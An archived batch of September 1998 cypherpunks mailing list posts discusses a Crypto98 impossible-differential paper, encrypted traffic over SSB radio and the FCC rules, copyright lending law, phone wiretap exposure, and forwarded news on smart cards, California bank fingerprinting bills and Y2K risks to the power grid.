Content-Type: text/plain



There's talk of a paper given at Crypto98 on "Impossible
Differential Analysis" which got the NSA people scribbling
like mad taking notes as though this was something that
had never come up at the agency and they'd better get
right on it.

Roughly, as I heard it (and I may be way off), the premise is 
that instead of using differential analysis for finding weaknesses 
in a cipher, to flip that to determine what could not possibly be 
a weakness in a cipher and build one with just those attributes.

Is this report correct, and is there a source for that paper?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Technical Incursion Countermeasures <lists@ticm.com>
Date: Thu, 10 Sep 1998 08:40:33 +0800
To: cypherpunks@toad.com
Subject: CFP: The Insider December 1998 edition
Message-ID: <3.0.3.32.19980910213019.009f3250@localhost>
MIME-Version: 1.0
Content-Type: text/plain



Call for Papers

The Insider - December 1998 edition

The Insider (http://www.ticm.com/info/insider/index.html) has been in
publication since November 1997. Since then it has gone trough a number of
changes - all for the better :}. The latest change is to move from a
newletter containing just the musing of its editor to a "learned journal".
Yes, the papers will be refereed and the editorial board has some weight in
the IT security world.

On that note this is the first Call for papers.

We are looking for papers on Information Technology Security and fitting
within the following broad areas: Audit, Design and Maintenance of IT
Security.

The Papers can be from 1000 to 2500 words. We may accept papers of down to
600 words or up to 5000 words but they will have to be of the utmost quality. 

For more information see http://www.ticm.com/info/insider/current.html 

Yours 

Bret Watson - Editor
Technical Incursion Countermeasures 
consulting@TICM.COM                      http://www.ticm.com/
ph: (+61)(041) 4411 149(UTC+8 hrs)      fax: (+61)(08) 9454 6042

The Insider - a e'zine on Computer security - August Edition out
http://www.ticm.com/info/insider/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Sep 1998 21:35:51 +0800
To: cypherpunks@Algebra.COM
Subject: Re: radio net
In-Reply-To: <199809091239.HAA15369@einstein.ssz.com>
Message-ID: <v04011720b21e3a549335@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



Hey, guys,

Someone here already said it, but nobody else got it, so I'll repeat it:
SSB, or Single Sideband. It's commercial ham radio, if you will, and all
the ships use it. I expect that you can shove anything down an SSB set that
you want, including encrypted traffic.

Ham radio is a government nerd subsidy, and as such, doesn't do much but
make more government funded/sactioned/approved/whatever nerds. :-).

SSB would do just fine. It's an international standard, after all, and
probably not under the control of any one government, even.e

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 22:16:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: radio net (fwd)
Message-ID: <199809110337.WAA08744@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 10 Sep 1998 22:28:02 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Re: radio net

> Someone here already said it, but nobody else got it, so I'll repeat it:
> SSB, or Single Sideband. It's commercial ham radio, if you will, and all
> the ships use it. I expect that you can shove anything down an SSB set that
> you want, including encrypted traffic.
> 
> Ham radio is a government nerd subsidy, and as such, doesn't do much but
> make more government funded/sactioned/approved/whatever nerds. :-).
> 
> SSB would do just fine. It's an international standard, after all, and
> probably not under the control of any one government, even.e

Single-sideband (SSB) isn't an international standard, it's a physical
effect.

See:

The Art of Electronics
Horowitz, Hill
ISBN 0-521-37095-7
pp. 897


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 10 Sep 1998 23:40:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Revenge of the AOLHoles
In-Reply-To: <199809110152.DAA09397@replay.com>
Message-ID: <199809110441.AAA00735@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809110152.DAA09397@replay.com>, on 09/11/98 
   at 03:52 AM, Anonymous <nobody@replay.com> said:

>Now maybe this stuff is good marketting practice, but it's a lousy way to
>serve the community which gives them life.

The saddest thing about advertizing: It works. :(

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: I went window shopping...and bought OS/2!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfir5I9Co1n+aLhhAQGyHQP/UIIleHN1WZK5AAzoQPHLMIu4ZfN4ECas
I50YxTxQ5MqnZwZi2VVxXik6RqwTreP3fsMiAlcE18nDxlAWSCc6eiJ6j4IzbOdO
ko9bVi4nfX/vEq8tLTtxVJLab3k6H+crsqHky9CxQK/4TPQk45LrxsXJ895IoIqD
IcsX2XSqYrs=
=s6UJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 10 Sep 1998 19:08:33 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
In-Reply-To: <3.0.5.32.19980909005149.0081d100@mail.xroads.com>
Message-ID: <b9ae87c3c80e37c2cd4b91f6119c76bd@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> Soren  <sorens@workmail.com> writes:

  > What about SSB?

  >> FCC regulations prohibit amateur radio services from carrying
  >> either encrypted OR commercial traffic.

SSB modulation hardly counts as encryption. (?!)
CFR 47 <http://www.fcc.gov/oet/info/rules/> says:

97.113 Prohibited transmissions.

(a) No amateur station shall transmit:

  (1) Communications specifically prohibited elsewhere in this part;

  (2) Communications for hire or for material compensation...

  (3) Communications in which the station licensee or control operator
  has a pecuniary interest...

  (4) Music using a phone emission except as specifically provided
  elsewhere in this section; communications intended to facilitate a
  criminal act; messages in codes or ciphers intended to obscure the
  meaning thereof, except as otherwise provided herein; obscene or
  indecent words or language; or false or deceptive messages, signals
  or identification;

  (5) Communications...which could reasonably be furnished
  alternatively through other radio services.

[snip]

97.117 International communications. 

Transmissions to a different country, where permitted, shall be made
in plain language and shall be limited to messages of a technical
nature relating to tests, and, to remarks of a personal character for
which, by reason of their unimportance, recourse to the public
telecommunications service is not justified.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 02:40:44 +0800
To: Tim May <tcmay@got.net>
Subject: Re: If there's a trial will some of us be witnesses?
In-Reply-To: <v03130304b21bb25ce70a@[209.66.100.149]>
Message-ID: <199809110742.AAA07729@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




hmmmm, I doubt carl johnson will claim he is innocent. or
has he? the trial is only necessary if he doesn't plead
guilty. depending on his lawyer & the evidence, that seems likely to
me if he was involved. there aren't any cpunks with the 
resources to take on uncle sam, except maybe... <g>

seriously, though, it's fun to fantasize. it would certainly
be the trial of the century. better than unabomber & oj
simpson combined. <g>

that reminds me.. before they caught him I always thought
the unabomber was probably on the cpunk list. I was quite
surprised when his antitechnology rant came out. he's got
the rant part down, but not the technology part!!

at one time, kevin mitnick was on this list, rumor has
it. probably many of the world's premiere hackers have been at one time or
another.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Thu, 10 Sep 1998 19:43:23 +0800
To: cypherpunks@Algebra.COM
Subject: Re: radio net (fwd)
In-Reply-To: <199809091239.HAA15369@einstein.ssz.com>
Message-ID: <35f871f9.173776779@news>
MIME-Version: 1.0
Content-Type: text/plain



On 10 Sep 1998 17:51:31 -0500, Greg Broiles <gbroiles@netbox.com> wrote:

>If you want to know what crypto regs and net use regs are going to look
>like in 10-20 years, look at the amateur radio regs now - we'll have
>citizens' committees (similar to the "block leaders" on GeoCities) who stay
>up late at night, unpaid, watching their fellow subjects for signs of
>pseudonym use, or the use of unlicensed/unapproved crypto, or "unlicensed
>Internet broadcasting".

Are we already seing this, with CAUCE and USENET II?  Good users are known
users (... and if it stops just one spammer...)

-- Phelix




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 11 Sep 1998 02:56:46 +0800
To: cypherpunks@cyberpass.net
Subject: Bits are Bits
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928463C@mossbay.chaffeyhomes.com>
Message-ID: <v03130304b21e7c88c3a5@[209.133.20.4]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:54 PM -0700 9/10/98, Matthew James Gering wrote:
>> Um, actualy not. It is actualy illegal for me to allow you to
>> borrow my books, CD's, albums, etc.
>
>Uh, how so? Distribution copyright covers first-sale only, after that
>the owner can lend or sell that item. If it were not for this, public
>and private libraries could not exist.

Several misc. points. Perhaps related, but I don't have the time to try to
figure out all the relations.

* Books: OK to resell. OK to lend. May or may not be OK to rent.

* Recorded music: OK to resell. OK to lend to private parties for
noncommercial use. NOT OK to rent.

* Recorded videos: OK to resell, OK to lend to private parties for
noncommercial use, OK to rent. (There are video rental stores, but not CD
rental stores.)

* Software: OK to resell if license allows it, if original is destroyed, if
no copies are kept, blah blah blah. (Very complicated.) Not legal to rent
software since around the mid-80s, when software rental stores stopped.

* It is not illegal under the Act passed by Congress authorizing a blank
media tax. (I think it was called the Home Recording Act, or somesuch.
Circa 1992-4.) The Act requires that blank tapes be taxed and then says
that "noncommercial use" is declared to be legal. In other words, the
government is collecting money from us and says as a result we get to tape
stuff for our own use.

* I myself have taped about 600 CDs and DATs, digitally taped onto DAT. (I
use a Sony home deck for some purposes, a Sony DATMAN for others, and a
Tascam DA-P1 portable for others. The Tascam is neat in that it ignores the
SCMS bits and thus allows unlimited DAT-to-DAT copying.) A friend of mine
has taped over 4500 recordings...he's a bit obsessive about his library of
"free" music. He uses public libraries to get a dozen or so CDs at a pop,
then loads them into a carousel player and records for 3-5 hours each
night, and often during the day.

* There is talk that the Bern Convention, which the U.S. recently signed,
overrides this Home Recording Act (or whatever the title was).

* As to public and private libraries, I think the situation is much more
unsettled than Matthew makes out:

-- lending (and presumably rental?) of books is allowed, by convention.

-- rental of software is no longer allowed (court case?)...it seems to have
ended around 1984 or so, when the software rental place near me announced
it could no longer rent software titles

-- rental of CDs is not apparently allowed...but sales of used CDs
are...and liberal return policies on new CDs are common (defacto rental).
The music store chain, "Wherehouse," was involved in a major court case on
this several years ago. I presume from their continued sale of used CDs
that they won. (The case may have involved whether record labels could
refuse to sell to them, a choice I would of course support, in a free
society.)

-- rental of videos is allowed. (Why videos but not CDs? What about books
on tape? What about books on CD, either audio or CD-ROM?)

Anyway, I can discern no clear point here. It all seems hodge podge.

* Just today I was at a store which was selling many copies of major
programs at deep, deep discounts. A set of "used" installation diskettes
for Microsoft's "Excel" was selling for $24.95. And so on. There is little
enforcement of laws supposedly stopping this.

* There is no ipso facto reason why a book publisher could not require as a
condition of sale that no resales, rental, or lendings occur with the
publisher's permission. In fact, some have argued for this.

* If the courts intervene to say such restrictions are not allowable, how
can such restrictions exist for software? (Sure, the usual and tired
"replicability" argument. But a publisher and author are "losing" just as
much when a bestseller is rented or lent out a dozen times instead of
generating sales....)

In closing, it's all a hodge podge. Books are just bits. Saying one set of
bits may be lent out, but another set may not is not a stable solution.

And we all know what cyberspace is doing to all of these points.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 02:46:36 +0800
To: "Ivan Cypherpunk" <cypherpunks@Algebra.COM>
Subject: Re: Joe Cypherpunk
In-Reply-To: <199809091200.IAA18283@www.video-collage.com>
Message-ID: <199809110747.AAA08019@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



wow, a new site called sixdegrees.com, in which everyone
registers and reveals who their friends are. the privacy
implications are really incredible. yet supposedly
close to 1 million people joined, with 900,000 of them
connected!!

 wow!! boy, it sure would be interesting to
write software that analyzed this data.

 reminds me of another program someone wrote that looked
up proper nouns in the ciabase database, I think, and
showed the relationships. probably the kind of software
that intelligence agencies use all the time. pretty sophisticated.

amazing what the information revolution is bringing. in
many ways, extraordinary things can be done merely by
sloshing information around in creative ways. no one
has really predicted some of the coolest stuff that
is happening.

wheeeeeeee!!! cyberspace is so much fun!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Fri, 11 Sep 1998 00:09:08 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: radio net (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
Message-ID: <19980911010325.B10226@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Sep 10, 1998 at 01:57:46PM -0700, Bill Stewart wrote:

> 
> But that doesn't mean there isn't a strong demand for voice privacy -
> just that the average consumer is satisfied having _some_ privacy,
> enough to keep casual observers out and neighbors from stealing phone service,
> and either doesn't believe the police would illegaly wiretap _him_,
> or (more cynically) doesn't believe the cellphone is enough protection
> if they do decide to target him.
> 
> 
	And it clearly isn't.   With the exception of cellphone to
cellphone traffic on one providers system (especially if it is GSM) the
traffic gets sent in the clear over trunking which is not particularly
well protected (and on occasion over microwave backhauls from cell sites
in the clear), to wire line phones which are often very vulnerable to
wiretaps.  And all of these are subject to CALEA access, and many also
to various  subrosa access via mechanisms provided for test and
maintainence and remote configuration of the system and trouble
diagnosis (mechanisms well and trully exploited by phreakers over the
years and well known and understood by the spooks as well).

	Without end to end encryption with secure key material the
security of any phone is weak at best, link encryption of vulnerable
links such as RF paths will keep the nosey out and raise the bar enough
so as to discourage that kind of penetration by professionals, but if
the call goes through switching and trunking infrastructure in the clear
it is  hardly difficult for large and powerful organizations to get
there hands on it if they really need it...

	And of course if they really get desparate, they can bug
the area the conversation is taking place in... or even the phones...


-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:11:39 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Impossible Analysis Paper at Crypto98
In-Reply-To: <199809110124.VAA25687@dewdrop2.mindspring.com>
Message-ID: <199809110813.BAA09626@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



a proof that you have an unbreakable cypher has a lot
of implications to the P=?NP question. if the analysis
is novel and elegant, than it might very well leads to
insights into P=?NP of computer science.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:35:12 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Smart Cards -- Public Acceptance?
Message-ID: <199809110836.BAA10995@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] Smart Cards -- Public Acceptance?
Date: Wed, 9 Sep 1998 22:07:48 -0500
To: ignition-point@majordomo.pobox.com

======================================================================
SCAN THIS NEWS
9/9/98

=======================================================================

New Poll: 76% Indicate Interest in Smart Cards

 SAN FRANCISCO--(BUSINESS WIRE)--Sept. 9, 1998--

 Smart Card Forum research study seeks keys to market success, ways to
bridge the gap between early adopters and the mainstream consumer market

 The Smart Card Forum (SCF), a multi-industry organization working to
accelerate the widespread acceptance of smart card technology, today
announced some initial top-line poll results of a qualitative and
quantitative research study it has commissioned. A detailed analysis of the
comprehensive study will be finalized in tandem with the Forum's Work Group
meetings this November in Florida.

 The Forum is attempting to better understand what North American consumers
would like in a smart card that they could carry around with them that
stores information or value (or both) from various applications (e.g.,
health care, insurance, banking, loyalty programs). These applications are
just some of what a smart card can do (the technology has many more
applications), but a study of how consumers perceive them will help the
industry better understand the potential size and shape of the future market
for smart card technology.

 "The smart card is a very exciting and powerful emerging technology," says
Forum President William J. Barr. "To extend its promise into the mainstream
commercial marketplace means understanding and then delivering what
consumers want. After all, it's a basic marketing premise that you have to
understand the public's needs before you can deliver a solution that will
win their support and loyalty. Previous Forum market research has shown
consumer interest in our industry; this next wave of research is designed to
provide us with more specific information that we can apply to the task of
introducing smart cards to the broadest possible consumer audience."

 FIND/SVP, a nationally known New York-based research and consulting firm,
was asked by the Forum to design the research study to capture consumer
perceptions of smart cards and the keys to their acceptance and use. To do
this, they designed a qualitative (14 focus groups) and quantitative
(telephone survey of 2,400) research study(a) conducted in the United States
and Canada. It was tightly focused to determine certain attributes of smart
cards, which applications would be supported and why, plus servicing,
branding, and pricing issues.

 For the purposes of the research, a very specific "smart card concept" was
developed and tested. It was described as a "card-sized unit with a memory
that can hold just about any kind of information but requires some sort of
reader to input or output data." Among the research findings:

- three quarters of those polled (76%) said they were "extremely," "very" or
"somewhat" interested in the smart card concept; about one-third (31%) were
"very" or "extremely" interested

- of the 31% "very" or "extremely" interested, the majority said that they
would "definitely want" smart cards for applications such as med-alert
information (74%); health insurance ID (62%); ATM and related bank access
(59%); drivers licenses (56%); and credit cards (53%)

- the most interested group were, in general, willing to pay up to $50 to
obtain a smart card, and a $25 annual fee to maintain the card

- that same group carried far more cards in their wallets than those not
interested (6.3 cards vs. 3.9 cards)

- those most interested fit the profile of early technology adopters:
younger, higher income, own a PC, etc.

- convenience and security were seen as key motivating factors for adoption

 "These initial results reveal a number of interesting things we didn't know
before," says Barr. "First, smart cards -- as they were conservatively
described in the research -- have a potential core early-adopter
constituency to start with of about a third of the population. Second, some
of the applications a smart card can enable are easily understood and
appreciated by that segment of the population. That's good news for the
industry, because it is the use of smart cards for each of these individual
things that will collectively increase the momentum towards
multiple-application smart card interoperability and ubiquity."

Interest in smart cards.

 All focus group respondents expressed interest in the "smart card concept."
It should be noted that these groups were pre-screened to eliminate
"technophobes," and participants developed concepts themselves, so higher
levels of enthusiasm for smart card technology were to be expected.

 However, approximately three-quarters of those polled in the telephone
survey said they were either "somewhat," "very" or "extremely" interested in
the smart card concept. About a quarter were not interested.

 Who are most interested in the idea of smart cards?

 The research discovered that those interested in smart cards - compared to
those "not interested" in the concept -- are:

- much more likely to have PCs, cell phones, or other high-tech devices (98%
vs. 68%) - much more likely to look forward to new technology (44% vs.
18%) - younger (38 vs. 48 years old) - have higher incomes ($54,000 vs.
$45,000) - already carrying more cards than those not interested (6.3 vs.
3.9)

 "Those numbers tell us that as an industry, we must extend our efforts
beyond the classic early adopter community and connect with the majority of
consumers who need to be educated about the many benefits to them of smart
card technology," says Barr.

 "Our ability to bridge that gap will determine the future success of our
industry."

One card to replace many.

 As designed by the focus groups, "Such a (smart) card would replace most of
what they now carried in their pockets and do other things as well. It would
not be used in addition to the cards in the wallets, but instead of those
cards."

 Of those interested in having a smart card (N=741): *T Would want only one
smart card 35% Would want two smart cards 30 Would want three smart cards 27
Would want four or more cards 6 *T One card that does many things.

 Within the qualitative phase, people were able to easily generate potential
uses for a smart card. More than 100 plausible application ideas were
generated, both for personal and for business use. These included: replacing
money and credit cards, replacing many of the cards in one's wallet, storing
records, and managing daily events.

 Of those interested the smart cards, respondents said that they would
"definitely want" them for:

Med-Alert information 74%, Health insurance ID 62, ATM and related bank
access 59, Drivers license 56, Credit cards 53, Prescription card 51, Car
information 50, Money for small purchases 48, Medical records 44, "Other" ID
39, Discount shopping cards 39, Money for larger purchases 36, Frequent
flyer information 34, "Other" membership cards 26.

 According to Barr, "we are pleased by these findings on applications,
because that's what smart cards are supposed to be all about. Smart cards
are supposed to perform lots of diverse functions, and we're pleased that
those surveyed could identify so many of them. Multi-application
interoperability is both the objective of the Smart Card Forum and the key
to unlocking the business potential of our industry."

The ideal way to distribute and control smart cards.

 A consensus emerged among those most interested in the concept about how
one would/should get and maintain a smart card:

- consumers would obtain a "starter" smart card from one of many sources,
either free or for a small fee

- they would "build" onto it by adding identification and licenses, personal
data, and credit data (among others), either free or for a small fee

- users would pay an independent service an annual fee to help maintain and
protect the card

- individual smart card-holders would allow different organizations
different levels of access to the card

Respondents disliked the idea of a single authority having access to all
their smart card key data. They accepted that in the absence of such an
authority, problems with maintaining the card, replacing it, canceling it,
etc. would become overwhelming. Accordingly, their plausible solution was
"distributed," allowing for widespread sale of smart cards at a very low
price, with the cards supported by an individual choice of one of many
independent "bonding agencies" paid monthly or annual fees for their
services. It was thought that data might also be backed up by this agency
(in encrypted form), or saved by the card's owner who would have two
versions of his/her card made.

Mild preference for adding data oneself 61%, Mild preference for having one
company to call for problems 59%, Mild preference for many suppliers 58%.

Pricing.

 In general, the research discovered that of those most interested in the
smart card concept, respondents were willing to pay up to $50 to obtain a
card, and approximately a $25 annual fee to maintain the card.

 Potential smart card users rarely envisioned a single-use card that would
be used in addition to the cards in their wallets. Rather, they were
interested in a card that would put multiple uses on a single device. The
key reasons for embracing the card thus focused heavily on convenience:
fewer things in one's wallet, fewer things to remember to carry.

 Another initial motivator might be security. A smart card can be made
significantly more secure than a normal magnetic stripe card, and when
introduced to that information, survey participants indicated that smart
cards might, by "electronically storing receipts in some way," provide
additional reassurance. The use of electronic fingerprinting (biometrics) as
proof of identity was also seen as a way to protect the security of
information stored on smart cards.

 "Security" was also interpreted as meaning medical safety and physical well
being. Accordingly, a smart card with emergency information accessible by
physicians and paramedics was also considered desirable.

 Other ways to encourage initial smart card use focused on having a smart
card doing certain things better than its "dumb" predecessor (e.g. a
"faster" or "less expensive" card). Using the card as an electronic key, to
which other applications might be added later, was also seen as a possible
benefit.

The bottom-line.

 "Using a very precise and narrow definition of a smart card, we have
discovered useful new information that we can apply as the full spectrum of
smart card applications emerges into the mainstream commercial environment,"
says Barr. "This is just the beginning of our industry's efforts to learn
about how we can connect with and educate consumers whose interest in smart
card technology increases in relation to the information they have about
it."

 The Smart Card Forum (www.smartcardforum.org) is a non-profit, multi-
industry organization of 200 members working to accelerate the widespread
acceptance of multiple application smart card technology by bringing
together, in an open forum, leading users and technologists from both the
public and private sectors.

NOTES:

- The "qualitative" aspect of this study comprised a set of 14 focus groups
that were conducted in four US cities (New York City, NY; Chicago, IL; San
Francisco, CA; and Jacksonville, FL), and two Canadian cities (Guelph and
Toronto, ON).

- The "quantitative" aspect comprised a much larger and more "projectable"
sample of 2,400 American and English-speaking Canadian citizens aged 18 and
over who completed a structured telephone interview. Respondents were
capable of using a smart card (e.g., had some other form of "plastic" card
or checking accounts) but otherwise were randomly selected.

CONTACT:
Megan McDonnell
Environics Communications
1 (203) 325-8772, #14
mmcdonnell@environics-usa.com
or
Karen Silberman
Smart Card Forum
1 (703) 610-9023
help@smartcardforum.org

=======================================================================
[forwarded from F.D. Bowden]
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:35:24 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] FW: CA Fingerprinting legislation
Message-ID: <199809110836.BAA11006@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] FW: CA Fingerprinting legislation
Date: Wed, 9 Sep 1998 22:12:08 -0500
To: ignition-point@majordomo.pobox.com

======================================================================
SCAN THIS NEWS
9/9/98

[Forwarded message]
======================================================================
Fr:	Jon Golinger, CALPIRG
Re:	Wrap-up on Bank Fingerprinting/Biometrics Legislation in California
this year
Date:	9/9/98

As you know, there was significant activity in the State Legislature this
year surrounding the use of fingerprints and other biometric identifiers
by banks and commercial entities.  This is an effort to summarize what
happened this year and solidify a coalition to work together on these
issues next year and in years to come.

There were two main bills introduced to address the
fingerprinting/biometrics issue - SB 1622 by Senator Steve Peace, which
would have prohibited banks from fingerprinting customers, and AB 50 by
Assemblyman Kevin Murray, which would have created some guidelines for
the use of fingerprints and other biometrics in the commercial sector. 
Neither piece of legislation passed this year.

SB 1622, backed by CALPIRG, the Privacy Rights Clearinghouse, ACLU, Ralph
Nader, and others, was approved by the State Senate and the Assembly
Judiciary Committee.  Opposed by the California Bankers Association and
some law enforcement officials, the bill was voted down in the Assembly
Banking Committee in early August and remained there for the rest of the
year.

AB 50, backed by the California Bankers Association and some law
enforcement officials, was heavily amended and approved by just one
Committee, the Senate Judiciary Committee, after extensive negotiations. 
Opposed by Nader, ACLU, CALPIRG, Privacy Rights Clearinghouse, and the
California Reinvestment Committee, AB 50 was expected to pass but was
pulled from the Senate Floor and killed by leadership the day before the
session ended.

So, the status quo leaves many California banks still fingerprinting
customers and the potential for other commercial uses of biometrics very
much an open question.  However, the banks and their allies failed to
close the door on this issue by passing the weak "consumer protections"
in AB 50 that would have effectively paved the way for fingerprinting and
biometrics in a variety of commercial situations and made it difficult to
pass consumer-friendly legislation in the future.

This issue will surely be the subject of legislation next year.  I
believe that it would be in the interests of those concerned about
privacy, discrimination, and "Big Brother" issues related to this subject
to begin discussions or meetings before the new legislative session
begins about a plan for the coming year.  We may also want to consider
establishing a "Privacy Coalition" to work on these and related issues as
they arise.  I will be in touch with interested groups and individuals
about this in the coming weeks.

We can be certain of one thing:  the banks and their allies will be back.
 So will we.

-----Original Message-----
From: Jon L Golinger [mailto:calpirg.golinger@juno.com] 
Sent: Wednesday, September 09, 1998 2:56 PM
To: mcdonald@networkusa.org
Subject: CA Fingerprinting legislation

=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Sep 1998 03:35:10 +0800
To: cypherpunks@cyberpass.net
Subject: IP: The big blackout?
Message-ID: <199809110836.BAA11018@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "Douglas E. Renz" <dougr@zlink.net>
Subject: IP: The big blackout?
Date: Thu, 10 Sep 1998 15:50:53 -0400
To: "'Chris Ball'" <1stlight@mail.tds.net>, "'En_Agape'" <en_agape@prodigy.net>, "'Kim/Jr'" <jrandkim@juno.com>, "'Kristen'" <kristen_renz@juno.com>, "'Steve Cortese'" <Sccortese@juno.com>, "'Tom Young'" <tayoung@cottagesoft.com>

September 7, 1998

The big blackout?

Regardless of your own Y2K preparedness, the slow-moving electrical industry
could leave you in the dark
By Blaise Zerega

Companies scrambling to bring their computer systems into year-2000
compliance may discover that their time and effort will be for naught. A
lack of preparedness by North America's electrical industry may pull the
plug on many companies' transition plans.

Although many electric companies have already begun addressing year-2000
compliance, some have not. It was only in June that the first industrywide
efforts got under way, which may not leave enough time for testing and
contingency planning, according to experts.

"I can't tell you overall how we stand. Based on the information we receive,
we'll build contingency plans off that," said Jon Arnold, chief technology
officer of the Edison Electric Institute (EEI), a trade organization in
Washington that represents companies supplying roughly 75 percent of North
America's electricity.

The North American Electric Reliability Council (NERC) will present the
first industry report on year-2000 readiness to the Department of Energy
(DOE) on Sept. 14, with public release slated for Sept. 17. Until the
publication of this report, serious questions about the capability of power
companies to generate, transmit, and distribute electric power -- and the
consequences for IT system and business disruptions -- will abound.

Industry experts point to the electric system's interconnectedness as the
potential source of most problems. North America is divided into three
interconnected power grids, which are made up of electric generating,
transmitting, and distribution companies. These thousands of companies
compose a high-level network that is only as strong as its weakest segment.

"If you have a failure in one place, it can affect the power delivery in
